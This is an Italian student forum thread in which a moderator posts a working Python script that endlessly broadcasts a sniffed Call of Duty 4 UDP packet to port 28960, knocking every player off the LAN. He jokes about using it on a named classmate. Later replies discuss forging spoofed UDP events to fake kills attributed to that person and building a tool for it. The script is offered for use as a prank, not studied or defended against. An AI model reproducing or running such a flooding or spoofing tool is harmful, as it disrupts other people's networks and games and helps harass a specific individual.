MT5
Vuoi reagire a questo messaggio? Crea un account in pochi click o accedi per continuare.

MT5

Forum per gli studenti di informatica dell'MT5
 
IndiceIndice  CercaCerca  Ultime immaginiUltime immagini  RegistratiRegistrati  Accedi  

 

 COD4 Denial Of Service

Andare in basso 
3 partecipanti
AutoreMessaggio
KillerCD
Moderatore
Moderatore
KillerCD


Numero di messaggi : 380
Età : 38
Localizzazione : Proprio Cosenza Cosenza
Data d'iscrizione : 16.12.07

COD4 Denial Of Service Empty
MessaggioTitolo: COD4 Denial Of Service   COD4 Denial Of Service Icon_minitimeGio Giu 12, 2008 2:24 am

ho notato che, a causa di un errore strutturale in Call Of Duty 4, è possibile bloccare i giocatori connessi alla lan. Il gioco letteralmente impazzisce....

ecco il prog in python per sfruttare questa vuln

Codice:


from socket import * #importo i socket e le funzioni di rete

data ="\x8d\xa2\x00\x00\xf5\x75\x30\xa8\x5d\x00\x00\xa9\x09\x00\x00\x69\xdf\x1e\x51\xf7\x66\x96\x33\x46\x0f\xa4\xf9\xf5\xae\x10\xb3\x89\x11\x14\x4e\xf1\x41\xa4\xff\x51\xaa\x30\x06\x21\xc4" #la stringa notifica lo spostamento di un giocatore o comunque qualche azione effettuata da esso

service = socket(AF_INET, SOCK_DGRAM) #inizializzo il "socket" UDP

while 1:
    service.sendto(data,("169.254.255.255",28960)) #l'indirizzo ip si riferisce al broadcast, mentre la porta è quella usata da COD


tutti i players connessi alla lan riceveranno il pacchetto all'infinito e nessuno sarà più in grado di giocare. E' divertente usarlo quando gioca DarKane

baciotti a tutti lol!
Torna in alto Andare in basso
http://greensmurf.wordpress.com/
garulf
Primi Passi
Primi Passi
garulf


Numero di messaggi : 59
Età : 36
Data d'iscrizione : 07.03.08

COD4 Denial Of Service Empty
MessaggioTitolo: Re: COD4 Denial Of Service   COD4 Denial Of Service Icon_minitimeGio Giu 12, 2008 12:06 pm

Bello!..funziona solo con l'azione associata a quella stringa o ne hai preso una a caso?
Sarebbe bello riuscire a far morire tutti..auhauhauahhua...
Torna in alto Andare in basso
KillerCD
Moderatore
Moderatore
KillerCD


Numero di messaggi : 380
Età : 38
Localizzazione : Proprio Cosenza Cosenza
Data d'iscrizione : 16.12.07

COD4 Denial Of Service Empty
MessaggioTitolo: Re: COD4 Denial Of Service   COD4 Denial Of Service Icon_minitimeGio Giu 12, 2008 12:57 pm

garulf ha scritto:
Bello!..funziona solo con l'azione associata a quella stringa o ne hai preso una a caso?
Sarebbe bello riuscire a far morire tutti..auhauhauahhua...

ho sniffato e ne ho presa una a caso, poi l'ho reinviata a tutti in un loop.
E' tecnicamente possibile fare quello che dici tu perchè: il protocollo utilizzato è UDP, quindi forgiare un pacchetto spoofato è semplice. Teoricamente potrei segnalare uno spostamento oppure un uccisione da parte di DarKane a tutti. Nessuno sarebbe in grado di capire se l'azione è avvenuta davvero o la trasmissione è stata avvelenata
Torna in alto Andare in basso
http://greensmurf.wordpress.com/
garulf
Primi Passi
Primi Passi
garulf


Numero di messaggi : 59
Età : 36
Data d'iscrizione : 07.03.08

COD4 Denial Of Service Empty
MessaggioTitolo: Re: COD4 Denial Of Service   COD4 Denial Of Service Icon_minitimeVen Giu 13, 2008 12:22 am

KillerCD ha scritto:
garulf ha scritto:
Bello!..funziona solo con l'azione associata a quella stringa o ne hai preso una a caso?
Sarebbe bello riuscire a far morire tutti..auhauhauahhua...

ho sniffato e ne ho presa una a caso, poi l'ho reinviata a tutti in un loop.
E' tecnicamente possibile fare quello che dici tu perchè: il protocollo utilizzato è UDP, quindi forgiare un pacchetto spoofato è semplice. Teoricamente potrei segnalare uno spostamento oppure un uccisione da parte di DarKane a tutti. Nessuno sarebbe in grado di capire se l'azione è avvenuta davvero o la trasmissione è stata avvelenata

Si..valla a trovare però la stringa giusta però..con un paio di prove e un pò di fortuna si potrebbe creare un bellissimo tool
"DarKane dice che è morto"..hhihi
(mi scusi darKane che neanche conosco Smile)
Torna in alto Andare in basso
joe23
Nuovo Ingresso
Nuovo Ingresso
joe23


Numero di messaggi : 29
Localizzazione : Palmi
Data d'iscrizione : 19.12.07

COD4 Denial Of Service Empty
MessaggioTitolo: Re: COD4 Denial Of Service   COD4 Denial Of Service Icon_minitimeSab Giu 14, 2008 4:08 pm

KillerCD ha scritto:
garulf ha scritto:
Bello!..funziona solo con l'azione associata a quella stringa o ne hai preso una a caso?
Sarebbe bello riuscire a far morire tutti..auhauhauahhua...

ho sniffato e ne ho presa una a caso, poi l'ho reinviata a tutti in un loop.
E' tecnicamente possibile fare quello che dici tu perchè: il protocollo utilizzato è UDP, quindi forgiare un pacchetto spoofato è semplice. Teoricamente potrei segnalare uno spostamento oppure un uccisione da parte di DarKane a tutti. Nessuno sarebbe in grado di capire se l'azione è avvenuta davvero o la trasmissione è stata avvelenata


Solo in questo modo Darkane può uccidere qualcuno lol! lol! lol!
Torna in alto Andare in basso
Contenuto sponsorizzato





COD4 Denial Of Service Empty
MessaggioTitolo: Re: COD4 Denial Of Service   COD4 Denial Of Service Icon_minitime

Torna in alto Andare in basso
 
COD4 Denial Of Service
Torna in alto 
Pagina 1 di 1

Permessi in questa sezione del forum:Non puoi rispondere agli argomenti in questo forum.
MT5 :: Area Informatica :: Informatica-
Vai verso: